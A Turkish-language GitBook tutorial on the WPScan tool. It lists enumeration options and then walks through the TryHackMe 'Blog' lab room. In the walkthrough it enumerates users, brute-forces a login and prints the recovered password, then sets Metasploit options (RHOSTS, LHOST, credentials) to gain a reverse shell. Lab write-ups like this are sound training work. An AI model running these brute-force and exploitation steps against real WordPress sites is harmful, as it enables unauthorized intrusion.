Yavuz Kuk
  • Ben kimim?
  • Linux Privilege Escalation (Linux Yetki Yükseltme)
  • 🚩Zafiyetler
    • API Testing
    • Authentication Vulnerabilities
    • Command Injection
    • File Upload
    • HTTP Host Header Attack
    • XSS (Cross Site Scripting)
    • LFI (Local File Inclusion)
    • Race Condition
    • JWT Bypass
    • Web Cache Poisoning
    • SOP ve CORS
  • 🚩Araçlar
    • Beef
    • FFUF
    • Gobuster
    • Hashcat
    • Hydra
    • John the Ripper
    • Nmap
    • Zphisher
    • Wpscan
  • 🚩Network
    • İnternet nedir?
    • IPv 4/6 nedir?
    • DHCP nedir?
    • Firewall nedir?
    • DNS nedir?
    • OSI modeli nedir?
    • TCP/IP modeli nedir?
    • NAT nedir?
    • Web Cache nedir?
  • 🚩Protokoller
    • SMB (Server Message Block)
    • Telnet
  • 🚩Diğer
    • CVSS nedir?
Powered by GitBook
On this page
  1. Araçlar

Wpscan

PreviousZphisherNextİnternet nedir?

Last updated 9 months ago

Wpscan açık kaynak kodlu geliştirilmiş ve terminalde çalıştırılan bir araçtır. WordPress kullanan sitelerde tarama yapmak için kullanılır.

WordPress siteleri hakkında temel bilgileri ve varsa güvenlik zafiyetleri hakkında bilgi verir. Kali Lİnux üzerinde yüklü olarak gelir.

Biraz Wpscan aracının yapabildiklerinden bahsedelim:

  • Tema taraması

  • Eklenti taraması

  • Brute Force

  • Dizin taraması vb.

Eğer başka bir dağıtım kullanıyorsanız aşşağıdaki kod ile Wpscan aracınızı indirebilirsiniz.

gem install wpscan

Aracımızın sahip olduğu parametreleri görmek için şu komutu kullanıyoruz:

wpscan -h

Bir web sitesi üzerinde tarama gerçekleştireceğimiz için bir url parametresine ihtiyacımız var. --url parametresiyle test edeceğimiz web sitesini parametre olarak veriyoruz.

Ayrıca aracın hangi türde bir tarama yapacağından bahsetmemiz lazım bunun içinde --enumerate parametresini kullanıyoruz.

--enumerate parametresiyle seçenekler vermemiz lazım:

  • t : Popüler temaları tarar

  • vt : Zafiyetli temaları tarar

  • p : Popüler eklentileri tarar

  • vp : Zafiyetli eklentileri tarar

  • ap : Bütün eklentileri tarar

Verilen --url parametresine göre popüler temaları tarar:

wpscan --url <ip/url> --enumerate t

-vt parametresiyle zafiyetli temaları tarar:

wpscan --url <ip/url> --enumerate vt

-p parametresiyle popüler eklentileri tarar:

wpscan --url <ip/url> --enumerate p

-vp parametresiyle zafiyetli eklentileri tarar:

wpscan --url <ip/url> --enumerate vp

-at parametresiyle bütün temalarda arama yapar:

wpscan --url <ip/url> --enumerate at

-ap parametresiyle bütün temalarda arama yapar:

wpscan --url <ip/url> --enumerate ap

Sonrasında tarayıcımdan blog.thm adresine gidiyorum. Ve sitede gezinirken en alt tarafta sitenin WordPress ile geliştirildiğine dair bir yazı yer alıyor.

Wpscan aracımız ile site üzerinde tarama yapabiliriz. Öncelikle zafiyetli eklentiler için bir tarama yapalım bunun için şu komutu yazıyoruz:

wpscan --url blog.thm --enumerate vp

Bu sorgunun sonucu olarak yararlı bir şey çıkmıyor. Var olan kullanıcıları listeleyeim ve sonrasında brute force deneyelim.

wpscan --url blog.thm --enumerate u

Bu işlemden sonra karşımıza şöyle bir sonuç çıkıyor.

2 tane kullanıcımız var Karen Wheeler ve Bill Joel. Bunların kullanıcı adları sırasıyla kwhell ve bjoel. Kullanıcı adlarını bulduğumuza göre login ekranına brute force deneyelim. Öncelikle kwhell kullanıcısı için bir komut yazacağım. Eğer şifreyi bulamazsak bjoel kullanıcısı içinde bir komut yazacağım.

wpscan --url blog.thm --usernames kwheel --passwords <sifre.txt>

Bu işlem sonucunda geçerli bir şifre elde ediyoruz.

kwheel - cutiepie1 bu bilgiler ile giriş yapalım ve bakalım sonrasında neler yapabiliyoruz.

Giriş yaptıktan sonra karşımıza ektra bir şey çıkmıyor. Web sitesi özelinde temel işle yapabiliyoruz. Bizim sunucuda olan dosyalarla işimiz var. WordPress'in eski sürümlerinde zafiyet olabilir ve biz bu zafiyeti kullanabiliriz. Zafiyetleri görmek için yukarıda yaptığımız wpscan --url blog.thm --enumerate vp komutundan biraz daha farklı bir şey yazacağız. Yukarıdaki gibi bir komut yazarsak Wpscan bize zafiyetleri göstermiyor.

wpscan --url blog.thm --enumerate vp --api-token <token>

Bu kod sonrasında sistemden şöyle bir çıktı almamız sağlar.

Çıktı olarak 70 tane zafiyetin olduğunu gösteriyor. WordPress sürümünü de öğrendikten sonra msfconsole üzerinden zafiyet araması yapabiliriz.

Karşımızı bu sonuçlar çıkıyor. use 0 diyerek payloadımı seçiyorum. Sonrasında payloadın bize sunduğu ayarları görmek için show options diyorum.

Sırasıyla şu ayarlamaları yapıyorum.

set PASSWORD cutiepie1
set RHOSTS 10.10.154.220 // THM odasının çalıştığı IP adresini veriyoruz
set USERNAME kwheel
set LHOST 10.6.63.226  // THM odasına bağlandığımız IP adresi
run

Run komutuyla birlikte exploitimiz çalışmaya başlıyor. Buradaki amacımız var olan bir zafiyeti sömürerek shell almaya çalışıyoruz.

Ve evet shell aldık, sistem üzerinde komutlar çalıştırabiliyoruz.

Wpscan aracımızı daha iyi tanımak ve kullanabilmek için odasında kullanacağım. Öncelikle web sitemizi çalıştırıyoruz. Öncelikle Try Hack Me tarafından bana verilen Ip adresini /etc/hosts altındaki dosyaya ekliyorum.

Bize zafiyetleri göstermesini istiyorsak adresinden bize sağlanan token değerini parametre olarak vermemiz gerekiyor.

Bu yazı tarafından hazırlanmıştır.

🚩
Try Hack Me Blog
Wpscan
Yavuz Kuk